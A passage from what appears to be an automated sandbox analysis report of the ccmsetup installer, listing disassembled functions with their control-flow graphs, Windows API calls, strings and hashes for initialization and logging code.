                                                                                          • Instruction Fuzzy Hash: 4F42B2B1940269AADB20DFA4DC49FEE7BB9BB45700F14809DF944A7382D7788B45CF60
                                                                                          Function 0058C6DE Relevance: 133.5, APIs: 18, Strings: 58, Instructions: 500threadsynchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 511 58c6de-58c723 call 5d22f4 call 6743a3 call 5fb1b1 518 58c725-58c72f call 5f0b53 511->518 519 58c776-58c784 call 57dada 511->519 524 58c75e-58c766 518->524 525 58c731-58c74f GetCurrentThreadId 518->525 526 58c786-58c790 call 5f0b53 519->526 527 58c7b7-58c7c5 call 58d37e 519->527 530 58c768 call 5f0dba 524->530 531 58c76d-58c771 524->531 529 58c754-58c75b call 5f1811 525->529 526->524 538 58c792-58c7b5 GetCurrentThreadId 526->538 541 58c7fb-58c812 call 5f3f50 527->541 542 58c7c7-58c7d1 call 5f0b53 527->542 529->524 530->531 537 58cdcd-58cdcf 531->537 539 58cdf8-58cdff call 5d2246 537->539 540 58cdd1-58cdf5 call 592624 537->540 538->529 540->539 553 58c81d 541->553 554 58c814-58c81b call 5a12d9 541->554 542->524 552 58c7d3-58c7f6 GetCurrentThreadId 542->552 552->529 555 58c81f-58c82a 553->555 554->555 557 58c82c-58c83b call 5f0b53 555->557 558 58c882-58c890 call 5a1d30 555->558 564 58c86a-58c872 557->564 565 58c83d-58c867 GetCurrentThreadId call 5f1811 557->565 566 58c8ca-58c8dd call 5fb0e2 558->566 567 58c892-58c89c call 5f0b53 558->567 570 58c879-58c87d 564->570 571 58c874 call 5f0dba 564->571 565->564 578 58c8df-58c8e9 call 5f0b53 566->578 579 58c917-58c91b 566->579 567->524 577 58c8a2-58c8c0 GetCurrentThreadId 567->577 570->540 571->570 577->566 578->524 585 58c8ef-58c90d GetCurrentThreadId 578->585 581 58c91d-58c91f 579->581 582 58c921 579->582 584 58c923-58c92b call 605d68 581->584 582->584 588 58c931-58c935 584->588 589 58c9b6-58c9ba 584->589 585->579 592 58c93b 588->592 593 58c937-58c939 588->593 590 58c9bc-58c9be 589->590 591 58c9c0 589->591 594 58c9c2-58c9d6 call 59c905 590->594 591->594 595 58c93d-58c943 call 607fc3 592->595 593->595 600 58c9d8-58c9e2 call 5f0b53 594->600 601 58ca10-58ca19 call 5f3b94 594->601 599 58c948-58c94f 595->599 599->601 602 58c955-58c964 call 5f0b53 599->602 600->524 609 58c9e8-58ca06 GetCurrentThreadId 600->609 612 58ca1b-58ca29 601->612 613 58ca54-58ca62 601->613 610 58c98e-58c9b1 call 592624 602->610 611 58c966-58c98b GetCurrentThreadId call 5f1811 602->611 609->601 610->524 611->610 618 58ca2b 612->618 619 58ca2d-58ca4c call 592624 612->619 614 58ca64 613->614 615 58ca66-58ca70 call 5f52af 613->615 614->615 626 58ca79-58ca82 call 5f3b94 615->626 627 58ca72 615->627 618->619 624 58ca51 619->624 624->613 630 58cabd-58cbd4 call 5f4253 call 578598 call 59ef10 call 60052a CreateMutexW call 57819c 626->630 631 58ca84-58ca92 626->631 627->626 645 58cbd9-58cbe8 call 6005cb 630->645 633 58ca94 631->633 634 58ca96-58cab5 call 592624 631->634 633->634 637 58caba 634->637 637->630 648 58cbea-58cc0d GetLastError call 5f0b53 645->648 649 58cc56-58cc97 call 60052a CreateEventW call 57819c call 6005cb 645->649 654 58cc0f-58cc34 GetCurrentThreadId call 5f1811 648->654 655 58cc37-58cc4e 648->655 662 58cc99-58ccbc GetLastError call 5f0b53 649->662 663 58cd05-58cd22 CreateEventW call 57819c 649->663 654->655 655->649 668 58ccbe-58cce3 GetCurrentThreadId call 5f1811 662->668 669 58cce6-58ccfd 662->669 670 58cd90-58cda8 663->670 671 58cd24-58cd47 GetLastError call 5f0b53 663->671 668->669 669->663 670->537 676 58cd49-58cd6e GetCurrentThreadId call 5f1811 671->676 677 58cd71-58cd88 671->677 676->677 677->670
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C6E5
                                                                                            • Part of subcall function 005FB1B1: __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                            • Part of subcall function 005FB1B1: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                            • Part of subcall function 005FB1B1: GetLastError.KERNEL32 ref: 005FB226
                                                                                            • Part of subcall function 005FB1B1: GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C747
                                                                                            • Part of subcall function 005A1D30: __EH_prolog3_catch_GS.LIBCMT ref: 005A1D3A
                                                                                            • Part of subcall function 005A1D30: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,CSetupEnvironment::Initialize), ref: 005A1DDC
                                                                                            • Part of subcall function 005A1D30: GetLastError.KERNEL32 ref: 005A1DE6
                                                                                            • Part of subcall function 005A1D30: GetCurrentThreadId.KERNEL32 ref: 005A1E1B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C7A8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C7E9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C853
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C8B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C905
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C977
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C9FE
                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,Global\CcmsetupMutex,O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY),00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?), ref: 0058CBCB
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CBEA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CC20
                                                                                            • Part of subcall function 0060052A: __EH_prolog3_catch.LIBCMT ref: 00600531
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,Global\CcmsetupServiceEvent,O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY),00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0058CC79
                                                                                            • Part of subcall function 0057819C: CloseHandle.KERNEL32 ref: 005781AB
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CC99
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CCCF
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?,?), ref: 0058CD11
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CD24
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CD5A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C7E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C84E
                                                                                          • ccmsetup.cpp, xrefs: 0058CD62
                                                                                          • ccmsetup.dat, xrefs: 0058CAFD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C8B3
                                                                                          • Failed to create ccmsetup mutex (0x%x), xrefs: 0058CC49
                                                                                          • ccmsetup.cpp, xrefs: 0058CC10
                                                                                          • ccmsetup.cpp, xrefs: 0058C8C0
                                                                                          • InitializeLogging(), xrefs: 0058C7DF
                                                                                          • ccmsetup.cpp, xrefs: 0058C9EE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CCCA
                                                                                          • SetObjectSecurity(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity), xrefs: 0058C9F4
                                                                                          • ccmsetup.cpp, xrefs: 0058CD4A
                                                                                          • g_pSetupEnv->Initialize(), xrefs: 0058C8AE
                                                                                          • ccmsetup.cpp, xrefs: 0058CA06
                                                                                          • ccmsetup.cpp, xrefs: 0058C737
                                                                                          • ccmsetup.cpp, xrefs: 0058C7D9
                                                                                          • Failed to create ccmsetup running event (0x%x), xrefs: 0058CD83
                                                                                          • ccmsetup.cpp, xrefs: 0058CC28
                                                                                          • CreateDownloadDirectory(), xrefs: 0058C79E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CC1B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CD55
                                                                                          • m_shRunningEvent.null() == false, xrefs: 0058CD50
                                                                                          • ccmsetup.cpp, xrefs: 0058C7B0
                                                                                          • ccmsetup.cpp, xrefs: 0058C843
                                                                                          • ccmsetup.cpp, xrefs: 0058C74F
                                                                                          • ccmsetup.cpp, xrefs: 0058C967
                                                                                          • Global\CcmsetupMutex, xrefs: 0058CBC3
                                                                                          • ccmsetup.cpp, xrefs: 0058C90D
                                                                                          • CcmSetup version: %s, xrefs: 0058CAAC
                                                                                          • ccmsetup.cpp, xrefs: 0058C7F1
                                                                                          • GetCcmSetupCacheDirectory(m_sCacheDir), xrefs: 0058C8FB
                                                                                          • ccmsetup.cpp, xrefs: 0058C85B
                                                                                          • O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY), xrefs: 0058C93D, 0058C9C2
                                                                                          • O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY), xrefs: 0058CBAC, 0058CC58
                                                                                          • CcmSetup::Initialize, xrefs: 0058C6F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C900
                                                                                          • Filesystem::Path::CreateEx(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity), xrefs: 0058C96D
                                                                                          • ccmsetup.cpp, xrefs: 0058C8F5
                                                                                          • m_shCcmsetupServiceEvent.null() == false, xrefs: 0058CCC5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C9F9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C972
                                                                                          • ccmsetup.cpp, xrefs: 0058C798
                                                                                          • Initialization failed with error 0x%x, xrefs: 0058CDE7
                                                                                          • (g_pSetupEnv = new CSetupEnvironment()) != 0, xrefs: 0058C849
                                                                                          • ccmsetup.cpp, xrefs: 0058C97F
                                                                                          • lj, xrefs: 0058CDD8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C742
                                                                                          • ccmsetup.cpp, xrefs: 0058CCD7
                                                                                          • m_shCcmsetupMutex.null() == false, xrefs: 0058CC16
                                                                                          • ccmsetup.cpp, xrefs: 0058CCBF
                                                                                          • ccmsetup.cpp, xrefs: 0058C8A8
                                                                                          • Failed to create cache folder with error 0x%x, xrefs: 0058C9A0
                                                                                          • GetCcmSetupDirectory(false, m_sDownloadDir), xrefs: 0058C73D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C7A3
                                                                                          • Launch from folder %s, xrefs: 0058CA43
                                                                                          • Global\CcmsetupServiceEvent, xrefs: 0058CC6F
                                                                                          • Failed to create ccmsetup service event (0x%x), xrefs: 0058CCF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$CreateH_prolog3_catch_$Event$CloseEnvironmentExpandFileH_prolog3_catchHandleModuleMutexNameStrings
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(g_pSetupEnv = new CSetupEnvironment()) != 0$CcmSetup version: %s$CcmSetup::Initialize$CreateDownloadDirectory()$Failed to create cache folder with error 0x%x$Failed to create ccmsetup mutex (0x%x)$Failed to create ccmsetup running event (0x%x)$Failed to create ccmsetup service event (0x%x)$Filesystem::Path::CreateEx(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity)$GetCcmSetupCacheDirectory(m_sCacheDir)$GetCcmSetupDirectory(false, m_sDownloadDir)$Global\CcmsetupMutex$Global\CcmsetupServiceEvent$Initialization failed with error 0x%x$InitializeLogging()$Launch from folder %s$O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY)$O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)$SetObjectSecurity(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.dat$g_pSetupEnv->Initialize()$lj$m_shCcmsetupMutex.null() == false$m_shCcmsetupServiceEvent.null() == false$m_shRunningEvent.null() == false
                                                                                          • API String ID: 4246382247-1528063290
                                                                                          • Opcode ID: 5f1f7be2528e1747a9c6e8af7f96b66492c8fd6e2eacc5d438fcb2bd01d4f26a
                                                                                          • Instruction ID: 763806949359e45d25caa96e302c9e79e3c993532df7f4cf0b6e99c31e69d738
                                                                                          • Opcode Fuzzy Hash: 5f1f7be2528e1747a9c6e8af7f96b66492c8fd6e2eacc5d438fcb2bd01d4f26a
                                                                                          • Instruction Fuzzy Hash: 0202D8B0A40345BEEB14EFA4CC49BEEBEA9FF15704F044169F909B7282D7B55904CBA1
                                                                                          Function 005F19FE Relevance: 131.7, APIs: 34, Strings: 41, Instructions: 462threadfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 680 5f19fe-5f1adc call 5d22f4 call 5d4610 * 2 687 5f1aef-5f1b2d call 5f10f0 680->687 688 5f1ade 680->688 689 5f1ae0 687->689 694 5f1b2f-5f1b5e WideCharToMultiByte 687->694 688->689 691 5f1ae6-5f1aea 689->691 693 5f2102-5f2104 691->693 695 5f211a-5f2157 call 59f417 * 2 693->695 696 5f2106-5f2114 693->696 697 5f1bbb-5f1bc2 694->697 698 5f1b60-5f1b81 GetLastError 694->698 719 5f216b-5f2172 call 5d2246 695->719 720 5f2159-5f2165 CloseHandle 695->720 696->695 701 5f1c24-5f1c2d 697->701 702 5f1bc4-5f1bd2 call 5bcb46 697->702 698->691 700 5f1b87-5f1ba8 GetCurrentThreadId 698->700 705 5f1bad-5f1bb6 call 5f1811 700->705 704 5f1c2e-5f1c53 WideCharToMultiByte 701->704 712 5f1c14-5f1c22 702->712 713 5f1bd4-5f1be6 702->713 709 5f1ccf-5f1cfe CreateFileW call 57814c 704->709 710 5f1c55-5f1c69 EnterCriticalSection 704->710 705->691 725 5f1d5b-5f1d6a GetFileType 709->725 726 5f1d00-5f1d21 GetLastError 709->726 710->709 715 5f1c6b-5f1c73 call 57814c 710->715 712->704 713->691 718 5f1bec-5f1c12 GetCurrentThreadId 713->718 724 5f1c78-5f1c7a 715->724 718->705 720->719 732 5f1e3b-5f1e44 724->732 733 5f1c80-5f1cb2 LockFileEx 724->733 729 5f1d6c-5f1d7e 725->729 730 5f1da8-5f1dba SetFilePointer 725->730 727 5f1d23-5f1d44 GetCurrentThreadId 726->727 728 5f1d52-5f1d56 726->728 734 5f1d49-5f1d4f call 5f1811 727->734 735 5f20eb-5f20f2 728->735 729->728 736 5f1d80-5f1da6 GetCurrentThreadId 729->736 730->724 737 5f1dc0-5f1ddd WriteFile 730->737 740 5f1e46-5f1e49 732->740 741 5f1e55 732->741 738 5f1cb8-5f1cca 733->738 739 5f1e35 733->739 734->728 735->693 745 5f20f4-5f20f6 735->745 736->734 737->724 744 5f1de3-5f1e04 GetLastError 737->744 738->735 739->732 740->741 746 5f1e4b-5f1e53 740->746 742 5f1e5b-5f1e69 SetFilePointer 741->742 747 5f1e6f-5f1e8e call 5f2842 742->747 748 5f2009-5f203c WriteFile 742->748 744->728 750 5f1e0a-5f1e30 GetCurrentThreadId 744->750 745->695 751 5f20f8-5f20fc LeaveCriticalSection 745->751 746->742 759 5f1ed7-5f1ee9 SetFilePointer 747->759 760 5f1e90-5f1e9d 747->760 753 5f203e-5f205f GetLastError 748->753 754 5f2090-5f209b 748->754 750->734 751->693 756 5f1ece-5f1ed2 753->756 757 5f2065-5f2086 GetCurrentThreadId 753->757 758 5f20d0-5f20d2 754->758 756->758 757->754 758->735 761 5f20d4-5f20e5 UnlockFileEx 758->761 763 5f1eeb-5f1f0c GetLastError 759->763 764 5f1f36-5f1f44 SetEndOfFile 759->764 760->756 762 5f1e9f-5f1ec0 GetCurrentThreadId 760->762 761->735 765 5f1ec5-5f1ecb call 5f1811 762->765 763->756 766 5f1f0e-5f1f34 GetCurrentThreadId 763->766 767 5f1f98-5f1fb5 WriteFile 764->767 768 5f1f46-5f1f67 GetLastError 764->768 765->756 766->765 767->748 770 5f1fb7-5f1fd8 GetLastError 767->770 768->756 769 5f1f6d-5f1f93 GetCurrentThreadId 768->769 769->765 770->756 772 5f1fde-5f1fff GetCurrentThreadId 770->772 772->748
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F1A08
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 005F1B50
                                                                                          • GetLastError.KERNEL32 ref: 005F1B60
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1B9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1C01
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000200,00000000,00000000), ref: 005F1C4B
                                                                                          • EnterCriticalSection.KERNEL32(00000004), ref: 005F1C59
                                                                                          • LockFileEx.KERNEL32(000000FF,00000002,00000000,00000001,00000000,?), ref: 005F1CAA
                                                                                          • CreateFileW.KERNEL32(?,80000006,00000003,00000000,00000004,00000080,00000000), ref: 005F1CE5
                                                                                          • GetLastError.KERNEL32 ref: 005F1D00
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1D38
                                                                                          • GetFileType.KERNEL32(000000FF), ref: 005F1D61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1D95
                                                                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 005F1DB2
                                                                                          • WriteFile.KERNEL32(000000FF,0092F200,00000003,?,00000000), ref: 005F1DD5
                                                                                          • GetLastError.KERNEL32 ref: 005F1DE3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1E1F
                                                                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 005F1E60
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1EB4
                                                                                          • UnlockFileEx.KERNEL32(000000FF,00000000,00000001,00000000,?), ref: 005F20E5
                                                                                          • LeaveCriticalSection.KERNEL32(00000002), ref: 005F20FC
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000200), ref: 005F215F
                                                                                          Strings
                                                                                          • uAnsiLength > 0, xrefs: 005F1B92
                                                                                          • ..\Logging.cpp, xrefs: 005F1F72
                                                                                          • WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 ), xrefs: 005F1E15
                                                                                          • ..\Logging.cpp, xrefs: 005F1F8E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1D90
                                                                                          • GetFileType(shLogFile) == 0x0001, xrefs: 005F1D8B
                                                                                          • ..\Logging.cpp, xrefs: 005F1D85
                                                                                          • SetFilePointer(shLogFile, 0, 0, 0) != ((DWORD)-1), xrefs: 005F1F19
                                                                                          • ..\Logging.cpp, xrefs: 005F1BF1
                                                                                          • (szAnsiBuffer.resize(uAnsiLength) == true) != 0, xrefs: 005F1BF7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1BFC
                                                                                          • ..\Logging.cpp, xrefs: 005F1EA4
                                                                                          • WriteFile( shLogFile, szAnsiBuffer.size() == 0 ? (LPVOID)szAnsiBuf : (LPVOID)szAnsiBuffer.getBuffer(), uAnsiLength - sizeof(CHAR),, xrefs: 005F2070
                                                                                          • shLogFile.null() == false, xrefs: 005F1D2E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2075
                                                                                          • WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 ), xrefs: 005F1FE9
                                                                                          • ..\Logging.cpp, xrefs: 005F1FE3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1D33
                                                                                          • RolloverLogFile( shLogFile, pszLogFile, uLogMaxHistory ), xrefs: 005F1EAA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1EAF
                                                                                          • ..\Logging.cpp, xrefs: 005F1D44
                                                                                          • ..\Logging.cpp, xrefs: 005F1E0F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1E1A
                                                                                          • ..\Logging.cpp, xrefs: 005F1F2F
                                                                                          • ..\Logging.cpp, xrefs: 005F1FFF
                                                                                          • ..\Logging.cpp, xrefs: 005F1D28
                                                                                          • ..\Logging.cpp, xrefs: 005F1BA8
                                                                                          • ..\Logging.cpp, xrefs: 005F1B8C
                                                                                          • ..\Logging.cpp, xrefs: 005F1C0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1FEE
                                                                                          • `)l, xrefs: 005F2140
                                                                                          • ..\Logging.cpp, xrefs: 005F206A
                                                                                          • ..\Logging.cpp, xrefs: 005F1F13
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1F7D
                                                                                          • ..\Logging.cpp, xrefs: 005F1DA1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1B97
                                                                                          • ..\Logging.cpp, xrefs: 005F1E2B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1F1E
                                                                                          • ..\Logging.cpp, xrefs: 005F2086
                                                                                          • SetEndOfFile(shLogFile), xrefs: 005F1F78
                                                                                          • ..\Logging.cpp, xrefs: 005F1EC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CurrentThread$ErrorLast$ByteCharCriticalMultiPointerSectionWide$CloseCreateEnterH_prolog3_catch_HandleLeaveLockTypeUnlockWrite
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(szAnsiBuffer.resize(uAnsiLength) == true) != 0$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$GetFileType(shLogFile) == 0x0001$RolloverLogFile( shLogFile, pszLogFile, uLogMaxHistory )$SetEndOfFile(shLogFile)$SetFilePointer(shLogFile, 0, 0, 0) != ((DWORD)-1)$WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 )$WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 )$WriteFile( shLogFile, szAnsiBuffer.size() == 0 ? (LPVOID)szAnsiBuf : (LPVOID)szAnsiBuffer.getBuffer(), uAnsiLength - sizeof(CHAR),$`)l$shLogFile.null() == false$uAnsiLength > 0
                                                                                          • API String ID: 1047489568-861514724
                                                                                          • Opcode ID: 56db83e344712da432b046a7b63a283b6ee3e6c148d693abfc456812bcd03ab1
                                                                                          • Instruction ID: 60d97da863157e7befb27fd4b3f9141a1e23052539fa5cc80c385177a7965dbd
                                                                                          • Opcode Fuzzy Hash: 56db83e344712da432b046a7b63a283b6ee3e6c148d693abfc456812bcd03ab1
                                                                                          • Instruction Fuzzy Hash: 5402C2B194462CEEEB20DF648C49BEABEBEBB54710F040195F609B21D0D77A4E90CF94
                                                                                          Function 005B291D Relevance: 112.4, APIs: 13, Strings: 51, Instructions: 412threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 774 5b291d-5b29e6 call 5d22f4 call 6013b4 call 5b14fc call 60b178 call 5f419f * 2 call 6743a3 call 603360 791 5b29e8-5b29f5 call 5f0b53 774->791 792 5b2a41-5b2a6a call 5c6026 call 603b66 774->792 798 5b29f7-5b2a18 GetCurrentThreadId 791->798 799 5b2a26-5b2a31 791->799 806 5b2a6c-5b2a79 call 5f0b53 792->806 807 5b2aa6-5b2abf call 5c6026 call 5ba395 792->807 801 5b2a1d-5b2a23 call 5f1811 798->801 802 5b2a38-5b2a3c 799->802 803 5b2a33 call 5f0dba 799->803 801->799 805 5b2f37-5b2f39 802->805 803->802 809 5b2f3b-5b2f44 call 5f3b94 805->809 810 5b2f6d-5b2fbe call 59ef10 * 2 call 5b15e4 call 5b15af call 577fd4 call 5d2246 805->810 806->799 820 5b2a7b-5b2aa1 GetCurrentThreadId 806->820 825 5b2b1f-5b2b3d call 60c143 807->825 826 5b2ac1-5b2ad3 call 5f0b53 807->826 809->810 822 5b2f46-5b2f6a call 592624 809->822 820->801 822->810 838 5b2b3f-5b2b4c call 5f0b53 825->838 839 5b2b7d-5b2b9b call 60c143 825->839 836 5b2ad5-5b2b01 GetCurrentThreadId call 5f1811 826->836 837 5b2b04-5b2b0f 826->837 836->837 844 5b2b11 call 5f0dba 837->844 845 5b2b16-5b2b1a 837->845 838->799 852 5b2b52-5b2b73 GetCurrentThreadId 838->852 854 5b2bdb-5b2bfc call 60bc69 839->854 855 5b2b9d-5b2baa call 5f0b53 839->855 844->845 845->809 852->839 863 5b2bfe-5b2c0b call 5f0b53 854->863 864 5b2c3c-5b2c5d call 60bc69 854->864 855->799 862 5b2bb0-5b2bd1 GetCurrentThreadId 855->862 862->854 863->799 869 5b2c11-5b2c32 GetCurrentThreadId 863->869 870 5b2c5f-5b2c6c call 5f0b53 864->870 871 5b2c9d-5b2cbe call 60bc69 864->871 869->864 870->799 876 